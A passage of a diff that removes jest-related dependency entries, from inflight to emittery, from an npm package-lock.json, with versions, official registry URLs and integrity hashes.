"sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", - "dev": true, - "peer": true - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-glob": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", - "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", - "dev": true, - "peer": true, - "requires": { - "is-extglob": "^2.1.1" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true - }, - "is-path-inside": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", - "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", - "dev": true, - "peer": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "dependencies": { - "@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - } - }, - "@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - } - }, - "@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - } - }, - "@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2" - } - }, - "@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - } - }, - "@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinclair/typebox": "^0.24.1" - } - }, - "@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - } - }, - "@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinonjs/commons": "^1.7.0" - } - }, - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true - }, - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true - }, - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "requires": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - } - }, - "diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true - }, - "emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": 